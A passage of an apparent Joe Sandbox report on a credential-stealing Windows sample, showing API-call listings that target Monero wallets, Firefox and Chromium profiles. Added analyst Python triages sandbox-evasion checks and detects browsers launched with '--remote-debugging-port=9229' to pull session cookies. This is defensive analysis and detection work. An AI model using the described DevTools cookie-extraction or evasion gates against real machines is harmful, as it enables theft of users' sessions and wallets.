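        return f"{n[1]} bytes, {flags(n[2], MEM)}, {PAGE.get(n[3], hex(n[3]))}"
    if c.api == "VirtualFree" and None not in n[1:3]:
        return f"{n[1]} bytes, {flags(n[2], MEM)}"
    if c.api == "GetCurrentProcess" and len(a) == 5 and None not in n[:5]:
        # The sandbox prints the stack at the call site; GetCurrentProcess takes no
        # arguments, so these are the values pushed for the call that follows (here they
        # fit VirtualAllocExNuma: lpAddress, dwSize, type, protect, preferred node).
        return f"next call: size={n[1]}, {flags(n[2], MEM)}, {PAGE.get(n[3], hex(n[3]))}"
    if c.api == "HttpOpenRequestA" and n[6] is not None:
        return f"verb={a[1]}, {flags(n[6], INET)}"
    if c.api == "InternetSetOptionA" and n[1] == 31:
        return "INTERNET_OPTION_SECURITY_FLAGS (value not captured)"
    return ""

def classify(calls):
    """Tag call patterns that usually mean a sandbox check or a C2 request."""
    apis = {c.api for c in calls}
    sizes = {c.api: c.args[1] for c in calls if c.api in ("VirtualAlloc", "VirtualFree") and len(c.args) > 1}
    hits = []
    if {"VirtualAllocExNuma", "ExitProcess"} <= apis:
        hits.append("numa-alloc-gate")    # consistent with "exit unless VirtualAllocExNuma works"
    big = sizes.get("VirtualAlloc")
    if isinstance(big, int) and big >= 256 * 2**20 and sizes.get("VirtualFree") == big:
        hits.append("large-alloc-probe")  # hundreds of MiB committed, then released again
    if apis & {"GetComputerNameA", "GetUserNameA"} and "ExitProcess" in apis:
        hits.append("host-name-gate")     # host/user name read, then exit (condition not shown)
    if {"InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA"} <= apis:
        hits.append("wininet-request")
    return hits

def triage(text):
    return {name: {"hits": classify(calls), "calls": [(c.api, decode(c)) for c in calls]}
            for name, calls in parse(text).items()}
```

`triage(SAMPLE)` decodes the VirtualAlloc entry as "399000000 bytes, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE" and tags the four blocks wininet-request, numa-alloc-gate, large-alloc-probe and host-name-gate; to reuse it on another report, paste that report's "APIs" lines into SAMPLE, one blank-line-separated block per function.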
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000), ref: 00A9F055
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 01bcdd83d92dc786f389c44039fd16c74aa125aa542449ff84dfc368baa3d902
                                        • Instruction ID: 310651c8b437aa056b231f3813787dfcb56c0de5eaf048c8e78d34e42eb0e74f
                                        • Opcode Fuzzy Hash: 01bcdd83d92dc786f389c44039fd16c74aa125aa542449ff84dfc368baa3d902
                                        • Instruction Fuzzy Hash: 75F058B1108608EFE7006F259C846BEFBF4EF95351F06081EDAC083721E27218908B47
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,007D0B32,007D0B2F,00000000,?,?,?,007D1450,007D0B2E), ref: 007BBEC5
                                        • StrCmpCA.SHLWAPI(?,007D1454), ref: 007BBF33
                                        • StrCmpCA.SHLWAPI(?,007D1458), ref: 007BBF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BC8A9
                                        • FindClose.KERNEL32(000000FF), ref: 007BC8BB
                                        Strings
                                        • Preferences, xrefs: 007BC104
                                        • Brave, xrefs: 007BC0E8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 007BC3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 007BC495
                                        • \Brave\Preferences, xrefs: 007BC1C1
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 007BC534
                                        • Google Chrome, xrefs: 007BC6F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 31017f05c92e26456dfa7a4ffd7fabc13b802e75abacdb20900974ee864fee3d
                                        • Instruction ID: e931af0da88956e21374f654ac333217686e8de025484996e830ef6935c95901
                                        • Opcode Fuzzy Hash: 31017f05c92e26456dfa7a4ffd7fabc13b802e75abacdb20900974ee864fee3d
                                        • Instruction Fuzzy Hash: 9352F2B2610108EBCB14FB60DD9AFEE733DAF54305F40459DB50A66191EE38AB48CF66
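The strings in this entry (Brave, Google Chrome, \Brave\Preferences, and three copies of --remote-debugging-port=9229 --profile-directory=") show the function building a browser command line that opens the Chrome DevTools remote-debugging port on a chosen user profile. A browser started that way accepts DevTools-protocol commands from any local client, which can then pull session cookies and site data out of the running browser instead of decrypting the on-disk cookie store. The listing shows neither the CreateProcess call nor the DevTools client, so the detection below keys on what it does show: the flag, the port and the profile selector. It is an added example, not from the report or the sample; it runs over constructed events modelled on Sysmon process-creation (ID 1) and network-connection (ID 3) records, with the field names and the DEV_PARENTS allow-list as assumptions to tune per estate.

```python
import re

# Added example, not from the report or the sample.  Events are constructed,
# modelled on Sysmon Event ID 1 (process creation) and 3 (network connection);
# the field names are this script's, not Sysmon's.
BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe"}
# Parents that legitimately start a browser with a DevTools port (assumption; tune per estate).
DEV_PARENTS = {"code.exe", "node.exe", "devenv.exe", "python.exe"}
PORT_RE = re.compile(r"--remote-debugging-port=(\d+)")
PROFILE_RE = re.compile(r'--profile-directory="?([^"\s]+)')

CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
BRAVE = r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
LAUNCHER = r"C:\Users\user\AppData\Local\Temp\file.exe"
EVENTS = [
    # normal user launch: no DevTools port, must not alert
    {"id": 1, "t": 1, "pid": 4412, "ppid": 1200, "image": CHROME,
     "parent": r"C:\Windows\explorer.exe", "cmd": f'"{CHROME}" --profile-directory=Default'},
    # the pattern in this report: a non-browser launcher opens port 9229 on a real profile
    {"id": 1, "t": 2, "pid": 5120, "ppid": 3344, "image": BRAVE, "parent": LAUNCHER,
     "cmd": f'"{BRAVE}" --remote-debugging-port=9229 --profile-directory="Default"'},
    # ... and then connects to that port itself
    {"id": 3, "t": 3, "pid": 3344, "image": LAUNCHER, "dst_ip": "127.0.0.1", "dst_port": 9229},
    # developer tooling doing the same thing legitimately: keep, but at low severity
    {"id": 1, "t": 4, "pid": 6000, "ppid": 2222, "image": CHROME,
     "parent": r"C:\Program Files\nodejs\node.exe", "cmd": f'"{CHROME}" --remote-debugging-port=9222'},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Alert on a browser started with a DevTools port, and on the process that
    started it connecting to that port (i.e. acting as the DevTools-protocol client)."""
    alerts, launches = [], {}            # launches: port -> process-creation event
    for e in sorted(events, key=lambda ev: ev["t"]):
        if e["id"] == 1 and basename(e["image"]) in BROWSERS:
            port = PORT_RE.search(e["cmd"])
            if not port:
                continue
            port = int(port.group(1))
            profile = PROFILE_RE.search(e["cmd"])
            parent = basename(e["parent"])
            alerts.append({"rule": "browser-remote-debugging-launch",
                           "severity": "low" if parent in DEV_PARENTS else "high",
                           "pid": e["pid"], "parent": parent, "port": port,
                           "profile": profile.group(1) if profile else None})
            launches[port] = e
        elif e["id"] == 3 and e["dst_ip"] == "127.0.0.1" and e["dst_port"] in launches:
            launch = launches[e["dst_port"]]
            if e["pid"] == launch["ppid"]:
                # The launcher now talks to the browser's DevTools endpoint: from here
                # cookies and site data can be exported from the live session.
                alerts.append({"rule": "launcher-connects-to-devtools", "severity": "critical",
                               "pid": e["pid"], "browser_pid": launch["pid"], "port": e["dst_port"]})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The first rule alone is noisy on developer workstations, which is why the parent allow-list only lowers severity rather than suppressing the event; the second rule, the launcher itself connecting to the port it opened, is the one worth paging on, because Puppeteer-style automation connects from the tool that started the browser too, but that tool is then in DEV_PARENTS.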
                                        APIs
                                        • wsprintfA.USER32 ref: 007C3B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C3B33
                                        • lstrcat.KERNEL32(?,?), ref: 007C3B85
                                        • StrCmpCA.SHLWAPI(?,007D0F58), ref: 007C3B97
                                        • StrCmpCA.SHLWAPI(?,007D0F5C), ref: 007C3BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C3EB7
                                        • FindClose.KERNEL32(000000FF), ref: 007C3ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 88d042fab8f5c014683658f7167f6e24f03a42af556ee0bde84ac9d6bb5bc6e2
                                        • Instruction ID: a70007b143ee66c8b99dda648e14b2da17890200ba73d24b37457365770772b3
                                        • Opcode Fuzzy Hash: 88d042fab8f5c014683658f7167f6e24f03a42af556ee0bde84ac9d6bb5bc6e2
                                        • Instruction Fuzzy Hash: E4A13FB1A00218ABDB34DFA4DC89FEE7378AB48700F54858DF60D96191EB749B85CF61
                                        APIs
                                        • wsprintfA.USER32 ref: 007C4B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C4B93
                                        • StrCmpCA.SHLWAPI(?,007D0FC4), ref: 007C4BC1
                                        • StrCmpCA.SHLWAPI(?,007D0FC8), ref: 007C4BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C4DCD
                                        • FindClose.KERNEL32(000000FF), ref: 007C4DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 697954b27fd5a2ba2719c02dd0d02e5e283a44c8a075657dd2e9dc5c88aba17a
                                        • Instruction ID: 9a8e23f2e24001d42a7f08c676681a5afc5c7a5bfecf4c0c7c437f01d74b157b
                                        • Opcode Fuzzy Hash: 697954b27fd5a2ba2719c02dd0d02e5e283a44c8a075657dd2e9dc5c88aba17a
                                        • Instruction Fuzzy Hash: 936127B1900118ABCB24EFE0DC99FEE737CAB48701F50458DB60996151EB75EB85CFA1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007C47D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C47D7
                                        • wsprintfA.USER32 ref: 007C47F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C480D
                                        • StrCmpCA.SHLWAPI(?,007D0FAC), ref: 007C483B
                                        • StrCmpCA.SHLWAPI(?,007D0FB0), ref: 007C4851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C48DB
                                        • FindClose.KERNEL32(000000FF), ref: 007C48F0
                                        • lstrcat.KERNEL32(?,0165F200), ref: 007C4915
                                        • lstrcat.KERNEL32(?,0165DAE0), ref: 007C4928
                                        • lstrlen.KERNEL32(?), ref: 007C4935
                                        • lstrlen.KERNEL32(?), ref: 007C4946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 1fd3bbf04cde2b4f8c77250017467121c03380b3d316fb9bc2b9b4fc9e1f7095
                                        • Instruction ID: 533a2012a45958ce848287dab36a165c2d6766423d4badb91fdb8c65ec791c7b
                                        • Opcode Fuzzy Hash: 1fd3bbf04cde2b4f8c77250017467121c03380b3d316fb9bc2b9b4fc9e1f7095
                                        • Instruction Fuzzy Hash: AB5156B1504218ABDB24EBB0DC99FED777CAB58700F40458CB64996190EB74DB85CFA1
                                        APIs
                                        • wsprintfA.USER32 ref: 007C4113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C412A
                                        • StrCmpCA.SHLWAPI(?,007D0F94), ref: 007C4158
                                        • StrCmpCA.SHLWAPI(?,007D0F98), ref: 007C416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C42BC
                                        • FindClose.KERNEL32(000000FF), ref: 007C42D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: d39b7817fb10c1f2e1c8c1cfcf307e309b35083680ccadc4ac9bf69a5c374cf1
                                        • Instruction ID: 8ff0f8fb224d9c731c49c76690683e0509ecb8b8316ec0c06281fcd9a12745c0
                                        • Opcode Fuzzy Hash: d39b7817fb10c1f2e1c8c1cfcf307e309b35083680ccadc4ac9bf69a5c374cf1
                                        • Instruction Fuzzy Hash: CF5156F2504118ABCB24EBB0DC99FEE737CBB58300F40468DB64996050EB75DB858F91
                                        APIs
                                        • wsprintfA.USER32 ref: 007BEE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007BEE55
                                        • StrCmpCA.SHLWAPI(?,007D1630), ref: 007BEEAB
                                        • StrCmpCA.SHLWAPI(?,007D1634), ref: 007BEEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BF3AE
                                        • FindClose.KERNEL32(000000FF), ref: 007BF3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: e19a1e375f1f75abe54426ea5071ddff43bde4a078f29503c1043511ccc8dde0
                                        • Instruction ID: 0ac9407cd3eae89f9e384acd921b2c3a34fa6d19d751f855cae0d6c4fcdcc78f
                                        • Opcode Fuzzy Hash: e19a1e375f1f75abe54426ea5071ddff43bde4a078f29503c1043511ccc8dde0
                                        • Instruction Fuzzy Hash: 52E13FB291111CEADB24EB60DC66FEE7339AF50305F4045DDB50A62092EE386F89CF65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: b6c814376e84f7c7210b09a60432e84e7b232d08549b843ab87270d46b808767
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: 49E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007D16B0,007D0D97), ref: 007BF81E
                                        • StrCmpCA.SHLWAPI(?,007D16B4), ref: 007BF86F
                                        • StrCmpCA.SHLWAPI(?,007D16B8), ref: 007BF885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BFBB1
                                        • FindClose.KERNEL32(000000FF), ref: 007BFBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 149d4eb5e16e6654583926bfa1cc496376762c23b7dde2f51d719162ae204f8e
                                        • Instruction ID: 8aa76483623265a28aee98f443d820cb30ef92fe38caca3e5d74a91f2a6e5887
                                        • Opcode Fuzzy Hash: 149d4eb5e16e6654583926bfa1cc496376762c23b7dde2f51d719162ae204f8e
                                        • Instruction Fuzzy Hash: 53B14371A00108EBCB24EF60DD9AFEE7379AF54305F4085ADE50A56151EF38AF48CB92
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007D523C,?,?,?,007D52E4,?,?,00000000,?,00000000), ref: 007B1963
                                        • StrCmpCA.SHLWAPI(?,007D538C), ref: 007B19B3
                                        • StrCmpCA.SHLWAPI(?,007D5434), ref: 007B19C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007B1D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 007B1E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007B1E60
                                        • FindClose.KERNEL32(000000FF), ref: 007B1E72
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,007D0C32), ref: 007BDF5E
                                        • StrCmpCA.SHLWAPI(?,007D15C0), ref: 007BDFAE
                                        • StrCmpCA.SHLWAPI(?,007D15C4), ref: 007BDFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BE4E0
                                        • FindClose.KERNEL32(000000FF), ref: 007BE4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007D15A8,007D0BAF), ref: 007BDBEB
                                        • StrCmpCA.SHLWAPI(?,007D15AC), ref: 007BDC33
                                        • StrCmpCA.SHLWAPI(?,007D15B0), ref: 007BDC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BDECC
                                        • FindClose.KERNEL32(000000FF), ref: 007BDEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ]}$]}$.t~_$X_}$Z[;$r{l$zz${Tq$'~
                                        • API String ID: 0-2082727148
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C9905
                                        • Process32First.KERNEL32(007B9FDE,00000128), ref: 007C9919
                                        • Process32Next.KERNEL32(007B9FDE,00000128), ref: 007C992E
                                        • StrCmpCA.SHLWAPI(?,007B9FDE), ref: 007C9943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C997A
